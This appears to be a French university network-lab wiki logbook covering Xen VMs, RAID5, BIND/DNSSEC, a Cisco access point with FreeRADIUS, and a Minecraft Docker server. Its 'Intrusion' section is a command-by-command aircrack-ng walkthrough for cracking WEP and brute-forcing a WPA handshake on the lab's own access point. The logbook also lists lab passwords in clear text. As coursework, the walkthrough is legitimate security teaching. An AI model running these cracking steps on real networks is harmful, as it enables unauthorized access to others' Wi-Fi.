Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
              ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour demarrer notre VM nous utilisons :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
&lt;br /&gt;
Le -c sert a se connecter directement &lt;br /&gt;
&lt;br /&gt;
Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults	0 2&lt;br /&gt;
 /dev/xvda4 /var  ext4 defaults	0 2&lt;br /&gt;
&lt;br /&gt;
On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:&lt;br /&gt;
 mkfs.ext4 /dev/xdva3&lt;br /&gt;
&lt;br /&gt;
==Sécurisation des données - RAID5==&lt;br /&gt;
&lt;br /&gt;
On sécurise nos données à l'aide de RAID5&lt;br /&gt;
&lt;br /&gt;
Installer les paquets nécessaires sur la VM et capbreton :&lt;br /&gt;
 apt install mdadm&lt;br /&gt;
&lt;br /&gt;
Créer les partitions virtuelles pour le RAID :&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-1 virtual&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-2 virtual&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-3 virtual&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-1,xvdd1,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-2,xvdd2,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-3,xvdd3,w'&lt;br /&gt;
                ]&lt;br /&gt;
On redémarre la VM :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
Créer le RAID5 à l’aide de la commande mdadm :&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdd1 /dev/xvdd2 /dev/xvdd3&lt;br /&gt;
Formater la partition RAID5 :&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
Ajout de la partition au fichier /etc/fstab :&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
On recharge les partitions afin de prendre en compte le RAID :&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
[[Fichier:RAID5.png]]&lt;br /&gt;
== Serveur DNS ==&lt;br /&gt;
===DNS===&lt;br /&gt;
Dans un premier temps, on utilise le registrar [[gandi.net|Gandi]] afin de réserver le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt;.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une fois le nom de domaine réservé, il est alors possible de configurer les serveurs de noms et les Glue Records :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter le Glue Record vers &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt; afin d’associer le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; à l’adresse IP &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier les serveurs de noms pour utiliser &amp;lt;code&amp;gt;ns.detestable.site&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ns6.gandi.net&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Installation du paquet &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install bind9&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 193.48.57.48&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;amp;quot;detestable.site&amp;amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;amp;quot;/etc/bind/db.detestable.site&amp;amp;quot;;&lt;br /&gt;
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.options&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;options{&lt;br /&gt;
  directory &amp;amp;quot;/var/cache/bind&amp;amp;quot;;&lt;br /&gt;
  dnssec-validation auto;&lt;br /&gt;
  listen-on-v6 { any; };&lt;br /&gt;
  allow-transfer { &amp;amp;quot;allowed_to_transfer&amp;amp;quot;; };&lt;br /&gt;
};&lt;br /&gt;
acl &amp;amp;quot;allowed_to_transfer&amp;amp;quot; {&lt;br /&gt;
  193.48.57.0/24;&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Créer le fichier BIND pour &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;cp /etc/bind/db.local /etc/bind/db.detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/db.detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for detestable.site&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.detestable.site. root.detestable.site. (&lt;br /&gt;
                              3         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@   IN  NS  ns.detestable.site.&lt;br /&gt;
@   IN  NS  ns6.gandi.net.&lt;br /&gt;
@   IN  A   193.48.57.163&lt;br /&gt;
NS  IN  A   193.48.57.163&lt;br /&gt;
NS  IN  AAAA    2001:660:4401:60a0:216:3eff:fe82:3e78&lt;br /&gt;
WWW IN  CNAME   NS&lt;br /&gt;
SSH IN  CNAME   NS&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Redémarrage du service &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 restart&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Tester DNS : ===&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 193.48.57.163&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Vérification de la traduction du nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nslookup detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===DNSSEC===&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.options&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-enable yes;&lt;br /&gt;
dnssec-validation yes;&lt;br /&gt;
dnssec-lookaside auto;&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Création du répertoire &amp;lt;code&amp;gt;detestable.site.dnssec&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;mkdir /etc/bind/detestable.site.dnssec/&lt;br /&gt;
cd /etc/bind/detestable.site.dnssec/&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Génération de la clef asymétrique de signature de clefs de zone :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-keygen -a RSASHA256 -b 2048 -f KSK -n ZONE detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;mv Kdetestable.site.*.key detestable.site-ksk.key&lt;br /&gt;
mv Kdetestable.site.*.private detestable.site-ksk.private&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Génération de la clef asymétrique de signature des enregistrements :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-keygen -a RSASHA256 -b 2048 -n ZONE detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;mv Kdetestable.site.*.key detestable.site-zsk.key&lt;br /&gt;
mv Kdetestable.site.*.private detestable.site-zsk.private&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/db.detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;$include &amp;amp;quot;/etc/bind/detestable.site.dnssec/detestable.site-ksk.key&amp;amp;quot;&lt;br /&gt;
$include &amp;amp;quot;/etc/bind/detestable.site.dnssec/detestable.site-zsk.key&amp;amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Signature des enregistrements de la zone :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-signzone -o detestable.site -k detestable.site-ksk ../db.detestable.site detestable.site-zsk&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;amp;quot;demineur.site&amp;amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;amp;quot;/etc/bind/db.detestable.site.signed&amp;amp;quot;;&lt;br /&gt;
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il ne reste plus qu’à communiquer la partie publique de la KSK (présente dans le fichier &amp;lt;code&amp;gt;detestable.site-ksk.key&amp;lt;/code&amp;gt;) à Gandi.&amp;lt;br /&amp;gt;&lt;br /&gt;
L’algorithme utilisé est le 8 (RSA/SHA-256).&lt;br /&gt;
&lt;br /&gt;
=== Vérification : ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;cd /etc/bind/&lt;br /&gt;
dnssec-verify -o detestable.site db.detestable.site.signed&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 restart&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Vérifier son DNS avec dnsviz ===&lt;br /&gt;
[[Fichier:dnsviz_detestable.jpg]]&lt;br /&gt;
&lt;br /&gt;
=Connexion wifi=&lt;br /&gt;
==Point d'accès wifi==&lt;br /&gt;
Paramètres de minicom&lt;br /&gt;
 Serial Device : /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
Mode terminal&lt;br /&gt;
 ap&amp;amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
Configuration du nom d’hôte :&lt;br /&gt;
 &amp;lt;pre&amp;gt;ap(config)#hostname SE2A5-AP1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Accès SSH :&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
Accès console :&lt;br /&gt;
 SE2A5-AP1(config)#line console 0&lt;br /&gt;
 SE2A5-AP1(config-line)#password glopglop&lt;br /&gt;
 SE2A5-AP1(config-line)#login authentification default&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
Sécurisation des accès :&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
VLAN n°20&lt;br /&gt;
 &amp;lt;SE2A5-AP1(config)#aaa authentication login EAP_toto group RADIUS_toto&lt;br /&gt;
 SE2A5-AP1(config)#radius-server host 193.48.57.163 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 SE2A5-AP1(config)#aaa group server radius RADIUS_toto&lt;br /&gt;
 SE2A5-AP1(config-server)#server 193.48.57.163 auth-port 1812 acct-port 1813&lt;br /&gt;
 SE2A5-AP1(config-server)#exit&lt;br /&gt;
 SE2A5-AP1(config)#dot11 ssid SE2A5_1&lt;br /&gt;
 SE2A5-AP1(config-ssid)#vlan 20&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication open eap EAP_toto&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication network-eap EAP_toto&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication key-management wpa&lt;br /&gt;
 SE2A5-AP1(config-ssid)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface dot11radio0.20&lt;br /&gt;
 SE2A5-AP1(config-subif)#encapsulation dot1q 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#bridge-group 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface g0.20&lt;br /&gt;
 SE2A5-AP1(config-subif)#encapsulation dot1q 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#bridge-group 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface dot11radio 0&lt;br /&gt;
 SE2A5-AP2(config-if)#no shutdown&lt;br /&gt;
 SE2A5-AP1(config-if)#encryption vlan 20 mode ciphers aes-ccm tkip&lt;br /&gt;
 SE2A5-AP1(config-if)#mbssid&lt;br /&gt;
 SE2A5-AP1(config-if)#ssid SE2A5_1&lt;br /&gt;
 SE2A5-AP1(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Paramètres de minicom&lt;br /&gt;
 Serial Device : /dev/ttyACM0&lt;br /&gt;
VLAN n°1 :&lt;br /&gt;
 SE2A5-AP1(config)#interface BVI 1&lt;br /&gt;
 SE2A5-AP1(config-if)#ip address 10.0.0.10 255.255.255.0&lt;br /&gt;
 SE2A5-AP1(config-if)#no shutdown&lt;br /&gt;
 SE2A5-AP1(config-if)#exit&lt;br /&gt;
 SE2A5-AP1(config)#ip default-gateway 10.0.0.1&lt;br /&gt;
&lt;br /&gt;
== Configuration du serveur RADIUS ==&lt;br /&gt;
&lt;br /&gt;
Le serveur RADIUS permet l’authentification des utilisateurs qui se connectent aux points d’accès Wifi (WPA-EAP).&lt;br /&gt;
&lt;br /&gt;
* Installer le paquet &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install freeradius&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modifier le fichier &amp;lt;code&amp;gt;/etc/freeradius/clients.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;client SE2A51 {&lt;br /&gt;
        ipaddr  = 10.0.0.10&lt;br /&gt;
        secret  = glopglop&lt;br /&gt;
}&lt;br /&gt;
}&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Ajouter un utilisateur en modifiant le fichier &amp;lt;code&amp;gt;/etc/freeradius/3.0/users&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;pifou Cleartext-Password := &amp;amp;quot;pasglop&amp;amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modifier le fichier &amp;lt;code&amp;gt;/etc/freeradius/3.0/mods-enables/eap&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;eap {&lt;br /&gt;
  default_eap_type = peap&lt;br /&gt;
  ...&lt;br /&gt;
}&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Arrêter le service &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; durant la phase de tests :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service freeradius stop&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Démarrer &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; en mode debug :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;freeradius -X&amp;lt;/pre&amp;gt;&lt;br /&gt;
Pendant que &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; est en mode debug, tenter de se connecter au réseau Wifi qui a été créé et vérifier que celle-ci est prise en compte.&amp;lt;br /&amp;gt;&lt;br /&gt;
[[Fichier:freeradius_X.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On peut également voir la connexion de l'appareil sur minicom&lt;br /&gt;
&lt;br /&gt;
[[Fichier:connexion_minicom.png]]&lt;br /&gt;
&lt;br /&gt;
Si la connexion est validée alors la configuration est correcte. Dans ce cas, arrêter le programme de debug et réactiver le service.&lt;br /&gt;
&lt;br /&gt;
* Redémarrer le service &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service freeradius start&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Intrusion =&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WEP ==&lt;br /&gt;
&lt;br /&gt;
Pour casser une clé WEP il nous faut le logiciel Aircrack:&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abord se mettre sur la bonne interface ethernet:&lt;br /&gt;
 airmon-ng start wlan0mon&lt;br /&gt;
&lt;br /&gt;
On se met ensuite en écoute sur ce réseau en indiquant le cryptage (WEP)&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On recupere ensuite l'ESSID et le BSSID correspondant a notre groupe (Groupe 1)&lt;br /&gt;
&lt;br /&gt;
(Ne pas juger la qualité du photographe)&lt;br /&gt;
[[Fichier:WEP_Liste.jpg]]&lt;br /&gt;
&lt;br /&gt;
On s'identifie&lt;br /&gt;
 aireplay-ng -9 -e cracotte01 -a 04:DA:D2:9C:50:50 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous recuperons ensuite les VI que l'on stock dans un fichier qui nous permettera de casser la clé :&lt;br /&gt;
 airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous procédons maintenant a la fausse identification: &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte01 -a 04:DA:D2:9C:50:50 -h 40:A5:EF:01:21:80 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu'a lancer le crack de la clé &lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:50 output*.cap&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Resultat: &lt;br /&gt;
&lt;br /&gt;
[[Fichier:cléWEP.jpeg]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WPA ==&lt;br /&gt;
&lt;br /&gt;
Nous allons utiliser le même logiciel que pour WEP (aircrack)&lt;br /&gt;
&lt;br /&gt;
Pour recuperer la clé WPA, il faut attendre un handshake de krakote01&lt;br /&gt;
 airodump-ng wlx40a5efd2140c --essid kracotte01 -c 4 -w /tmp/wpa&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake recuperer nous allons generer un dictionvaire de mot de passe (ici une combinaison de 8 chiffres)&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Il nous reste plus qu'a utiliser aircrack comme ceci&lt;br /&gt;
 aircrack-ng -w password.lst wpa02.cap&lt;br /&gt;
&lt;br /&gt;
Il faut desormais être patient et attendre 5h40 pour essayer tout le dictionnaire.&lt;br /&gt;
&lt;br /&gt;
Un essaie en subdivisant a été fait mais sans resultat dans le temp imparti&lt;br /&gt;
&lt;br /&gt;
Après 4 heures 1 minutes et 29 seconde nous avons la clé: &lt;br /&gt;
 66699666&lt;br /&gt;
&lt;br /&gt;
[[Fichier:WPA_crack.png]]&lt;br /&gt;
&lt;br /&gt;
=MINECRAFT=&lt;br /&gt;
&lt;br /&gt;
Nous allons installer un serveur minecraft sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour cela nous allons avoir besoin de DOCKER&lt;br /&gt;
 apt-get install docker&lt;br /&gt;
&lt;br /&gt;
Une fois l'installation faite nous devons prendre une image de serveur minecraft:&lt;br /&gt;
 docker run -d -it -p 25565:25565 -e EULA=TRUE itzg/minecraft-server&lt;br /&gt;
&lt;br /&gt;
Cette image vient du github: https://github.com/itzg/docker-minecraft-server&lt;br /&gt;
&lt;br /&gt;
Nous mettons le port 25565 car c'est le port utilisé par minecraft&lt;br /&gt;
&lt;br /&gt;
Une fois cela fait nous pouvons visualiser les docker activité&lt;br /&gt;
 docker ps &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:docker_minecraft.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Connexion==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter il suffit d'avoir un minecraft et de renseigner l'IP du serveur&lt;br /&gt;
&lt;br /&gt;
[[Fichier:minecraft_pc.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le problème avec ce serveur minecraft est sa gourmandise en memoire. En effet, celui-ci plante lorsqu'il y a trop de redstone sur le serveur ou qu'il y a une trop grosse explosion de TNT.&lt;br /&gt;
&lt;br /&gt;
Cela doit être dû (pour la TNT) a un trop gros changement de map et besoin d'affichage qui nécessite trop de mémoire vive.&lt;br /&gt;
&lt;br /&gt;
Pour la redstone, étant donné que nous avons essayé de recréer des portes logique, cela devait trop &amp;quot;consommer&amp;quot;&lt;/div&gt;</summary>
		<author><name>Amace</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60273</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60273"/>
				<updated>2022-11-28T23:48:55Z</updated>
		
		<summary type="html">&lt;p&gt;Amace : /* Serveur DNS */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;br /&gt;
== Cahier de suivi - Groupe 1 ==&lt;br /&gt;
= Sommaire =&lt;br /&gt;
&lt;br /&gt;
* [[#plan-dadressage|Plan d’adressage]]&lt;br /&gt;
* [[#machine-virtuelle|Machine Virtuelle]]&lt;br /&gt;
* [[#Intrusion|Intrusion]]&lt;br /&gt;
&lt;br /&gt;
= Plan d’adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV  routée !! Nom de domaine !&lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Machine Virtuelle =&lt;br /&gt;
&lt;br /&gt;
== Création de la VM ==&lt;br /&gt;
&lt;br /&gt;
Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va &amp;quot;heberger&amp;quot; notre VM xen&lt;br /&gt;
 ssh root@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
On crée ensuite notre vm avec :&lt;br /&gt;
 xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :&lt;br /&gt;
 vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]&lt;br /&gt;
&lt;br /&gt;
On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :&lt;br /&gt;
 lvcreate -L10G -n HG-home storage&lt;br /&gt;
 lvcreate -L10G -n HG-var storage&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
              ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour demarrer notre VM nous utilisons :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
&lt;br /&gt;
Le -c sert a se connecter directement &lt;br /&gt;
&lt;br /&gt;
Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults	0 2&lt;br /&gt;
 /dev/xvda4 /var  ext4 defaults	0 2&lt;br /&gt;
&lt;br /&gt;
On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:&lt;br /&gt;
 mkfs.ext4 /dev/xdva3&lt;br /&gt;
&lt;br /&gt;
==Sécurisation des données - RAID5==&lt;br /&gt;
&lt;br /&gt;
On sécurise nos données à l'aide de RAID5&lt;br /&gt;
&lt;br /&gt;
Installer les paquets nécessaires sur la VM et capbreton :&lt;br /&gt;
 apt install mdadm&lt;br /&gt;
&lt;br /&gt;
Créer les partitions virtuelles pour le RAID :&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-1 virtual&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-2 virtual&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-3 virtual&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-1,xvdd1,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-2,xvdd2,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-3,xvdd3,w'&lt;br /&gt;
                ]&lt;br /&gt;
On redémarre la VM :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
Créer le RAID5 à l’aide de la commande mdadm :&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdd1 /dev/xvdd2 /dev/xvdd3&lt;br /&gt;
Formater la partition RAID5 :&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
Ajout de la partition au fichier /etc/fstab :&lt;br /&gt;
